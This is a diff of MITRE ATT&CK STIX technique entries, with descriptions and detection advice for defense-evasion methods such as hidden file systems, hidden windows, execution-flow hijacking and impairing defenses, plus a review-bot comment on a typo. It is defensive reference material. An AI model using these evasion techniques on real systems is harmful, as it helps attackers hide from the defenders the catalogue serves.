- "x_mitre_detection": "It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory service object was modified\n* Event ID 5137 - A directory service object was created\n* Event ID 5138 - A directory service object was undeleted\n* Event ID 5139 - A directory service object was moved\n* Event ID 5141 - A directory service object was deleted\n\n\nGPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704). ",
- "x_mitre_defense_bypassed": [
- "System access controls",
- "File system access controls"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -11571,21 +11982,21 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-31T12:53:56.361Z",
+ "modified": "2020-06-17T14:25:38.082Z",
"created": "2020-02-11T18:43:06.253Z",
- "x_mitre_detection": "Monitor for attempts to access SYSVOL that involve searching for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)",
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "Windows event logs"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_permissions_required": [
"User"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "Windows event logs"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Monitor for attempts to access SYSVOL that involve searching for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)"
},
{
"id": "attack-pattern--086952c4-5b90-4185-b573-02bad8e11953",
@@ -11636,26 +12047,26 @@
],
"modified": "2020-03-29T22:09:18.020Z",
"created": "2020-02-21T20:56:06.498Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_defense_bypassed": [
+ "Host forensic analysis",
+ "Log analysis"
+ ],
+ "x_mitre_detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL environment variable is also suspicious.",
"x_mitre_data_sources": [
"Environment variable",
"File monitoring",
"Authentication logs",
"Process monitoring"
],
- "x_mitre_detection": "Correlating a user session with a distinct lack of new commands in their .bash_history can be a clue to suspicious behavior. Additionally, users checking or changing their HISTCONTROL environment variable is also suspicious.",
- "x_mitre_defense_bypassed": [
- "Host forensic analysis",
- "Log analysis"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"id": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9",
@@ -11704,18 +12115,80 @@
"phase_name": "initial-access"
}
],
- "modified": "2019-07-17T21:35:06.932Z",
+ "modified": "2020-07-14T19:36:40.493Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "Asset management",
- "Data loss prevention"
- ],
- "x_mitre_detection": "Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. \n\nEndpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.",
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Windows",
"Linux",
"macOS"
+ ],
+ "x_mitre_detection": "Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. \n\nEndpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.",
+ "x_mitre_data_sources": [
+ "Asset management",
+ "Data loss prevention"
+ ],
+ "x_mitre_version": "1.0"
+ },
+ {
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1564.005",
+ "url": "https://attack.mitre.org/techniques/T1564/005"
+ },
+ {
+ "source_name": "MalwareTech VFS Nov 2014",
+ "url": "https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html",
+ "description": "Hutchins, M. (2014, November 28). Virtual File Systems for Beginners. Retrieved June 22, 2020."
+ },
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html",
+ "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.",
+ "source_name": "FireEye Bootkits"
+ },
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "Kaspersky Equation QA",
+ "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, February). Equation Group: Questions and Answers. Retrieved December 21, 2015.",
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Hidden File System",
+ "description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)\n\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)",
+ "id": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04",
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "modified": "2020-06-29T15:12:11.024Z",
+ "created": "2020-06-28T22:55:55.719Z",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Windows Registry"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_detection": "Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -11749,6 +12222,22 @@
"created": "2017-12-14T16:46:06.044Z"
},
{
+ "created": "2020-02-26T17:46:13.128Z",
+ "modified": "2020-03-29T22:32:25.985Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \u2018hidden\u2019 file. These files don\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls \u2013a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \u201c.\u201d as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, \u2018.\u2019, are by default hidden from being viewed in the Finder application and standard command-line utilities like \u201cls\u201d. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn\u2019t clutter up the user\u2019s workspace. For example, SSH utilities create a .ssh folder that\u2019s hidden and contains the user\u2019s known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.",
+ "name": "Hidden Files and Directories",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -11771,22 +12260,6 @@
"source_name": "WireLurker"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Hidden Files and Directories",
- "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \u2018hidden\u2019 file. These files don\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls \u2013a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \u201c.\u201d as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, \u2018.\u2019, are by default hidden from being viewed in the Finder application and standard command-line utilities like \u201cls\u201d. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn\u2019t clutter up the user\u2019s workspace. For example, SSH utilities create a .ssh folder that\u2019s hidden and contains the user\u2019s known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.",
- "id": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
- ],
- "modified": "2020-03-29T22:32:25.985Z",
- "created": "2020-02-26T17:46:13.128Z",
"x_mitre_platforms": [
"Windows",
"macOS",
@@ -11856,19 +12329,19 @@
],
"modified": "2020-03-29T22:36:25.994Z",
"created": "2020-03-13T20:12:40.876Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Authentication logs"
],
- "x_mitre_detection": "This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
"x_mitre_permissions_required": [
"root",
"Administrator"
],
- "x_mitre_data_sources": [
- "File monitoring",
- "Authentication logs"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.",
+ "x_mitre_platforms": [
+ "macOS"
]
},
{
@@ -11919,7 +12392,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Hidden Window",
- "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nOn Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [VBScript](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)\n\nSimilarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)",
+ "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nOn Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)\n\nSimilarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)",
"id": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -11930,41 +12403,61 @@
],
"modified": "2020-03-29T22:49:43.557Z",
"created": "2020-03-13T20:26:49.433Z",
- "x_mitre_platforms": [
- "macOS",
- "Windows"
+ "x_mitre_contributors": [
+ "Travis Smith, Tripwire"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters",
"PowerShell logs"
],
- "x_mitre_detection": "Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Travis Smith, Tripwire"
+ "x_mitre_platforms": [
+ "macOS",
+ "Windows"
]
},
{
+ "id": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8",
+ "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)",
+ "name": "Hide Artifacts",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
"external_id": "T1564",
"url": "https://attack.mitre.org/techniques/T1564"
+ },
+ {
+ "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/",
+ "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.",
+ "source_name": "Sofacy Komplex Trojan"
+ },
+ {
+ "url": "https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty",
+ "description": "Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved July 8, 2017.",
+ "source_name": "Cybereason OSX Pirrit"
+ },
+ {
+ "url": "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/",
+ "description": "Arntz, P. (2015, July 22). Introduction to Alternate Data Streams. Retrieved March 21, 2018.",
+ "source_name": "MalwareBytes ADS July 2015"
+ },
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Hide Artifacts",
- "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. \n\nAdversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection. ",
- "id": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -11972,7 +12465,7 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T22:49:43.726Z",
+ "modified": "2020-07-06T19:03:40.511Z",
"created": "2020-02-26T17:41:25.933Z",
"x_mitre_platforms": [
"Linux",
@@ -11981,7 +12474,7 @@
],
"x_mitre_is_subtechnique": false,
"x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage. ",
+ "x_mitre_detection": "Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.",
"x_mitre_data_sources": [
"API monitoring",
"PowerShell logs",
@@ -12009,7 +12502,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Hijack Execution Flow",
- "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as whitelisting or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.",
+ "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.",
"id": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -12026,20 +12519,8 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T17:33:44.855Z",
+ "modified": "2020-06-26T16:09:59.324Z",
"created": "2020-03-12T20:38:12.465Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
- ],
- "x_mitre_detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.\n\nLook for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nMonitor for changes to environment variables, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.\n\nService changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. 
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.",
"x_mitre_data_sources": [
"Environment variable",
"Loaded DLLs",
@@ -12047,6 +12528,18 @@
"Process monitoring",
"File monitoring",
"DLL monitoring"
+ ],
+ "x_mitre_detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.\n\nLook for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nMonitor for changes to environment variables, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.\n\nService changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. 
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.",
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -12188,20 +12681,20 @@
],
"modified": "2020-03-30T13:44:04.712Z",
"created": "2017-05-31T21:30:50.958Z",
- "x_mitre_version": "2.0",
- "x_mitre_data_sources": [
- "System calls"
+ "x_mitre_deprecated": true,
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_detection": "Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present. (Citation: virtualization.info 2006)",
"x_mitre_permissions_required": [
"Administrator",
"SYSTEM"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_detection": "Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present. (Citation: virtualization.info 2006)",
+ "x_mitre_data_sources": [
+ "System calls"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_deprecated": true
+ "x_mitre_version": "2.0"
},
{
"id": "attack-pattern--62166220-e498-410f-a90a-19d4339d4e99",
@@ -12321,12 +12814,13 @@
],
"modified": "2020-03-24T19:39:50.839Z",
"created": "2020-01-24T15:05:58.384Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Oddvar Moe, @oddvarmoe"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
],
+ "x_mitre_detection": "Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)",
"x_mitre_data_sources": [
"API monitoring",
"Windows event logs",
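Review bot: The relocated `x_mitre_detection` value on the new side still reads "the Glfags tool", which looks like a transposition of Gflags (the Windows Global Flags editor the IFEO citation refers to); the commit moves the string without correcting it. Because this bundle appears to be regenerated from upstream ATT&CK STIX data, the one-word change `Glfags` → `Gflags` belongs upstream rather than as a hand edit here, or it will be reverted on the next sync. A short note in the sync tooling or README recording known upstream text defects would keep reviewers from re-flagging it on every refresh.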
@@ -12334,15 +12828,21 @@
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nMonitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
+ "x_mitre_contributors": [
+ "Oddvar Moe, @oddvarmoe"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "id": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529",
+ "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.",
+ "name": "Impair Defenses",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -12350,13 +12850,6 @@
"url": "https://attack.mitre.org/techniques/T1562"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Impair Defenses",
- "description": "Adversaries may maliciously modify a victim system in order hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.",
- "id": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -12364,14 +12857,20 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T22:18:11.350Z",
+ "modified": "2020-07-09T14:43:42.718Z",
"created": "2020-02-21T20:22:13.470Z",
"x_mitre_platforms": [
"Linux",
"Windows",
- "macOS"
+ "macOS",
+ "AWS",
+ "GCP",
+ "Azure"
],
"x_mitre_data_sources": [
+ "GCP audit logs",
+ "Azure activity logs",
+ "AWS CloudTrail logs",
"Anti-virus",
"Services",
"API monitoring",
@@ -12439,26 +12938,29 @@
],
"modified": "2020-03-25T22:47:34.137Z",
"created": "2019-09-04T12:04:03.552Z",
- "x_mitre_platforms": [
- "GCP",
- "Azure",
- "AWS"
- ],
- "x_mitre_contributors": [
- "Praetorian"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.",
+ "x_mitre_is_subtechnique": false,
"x_mitre_data_sources": [
"File monitoring",
"Asset management"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Praetorian"
+ ],
+ "x_mitre_platforms": [
+ "GCP",
+ "Azure",
+ "AWS"
+ ]
},
{
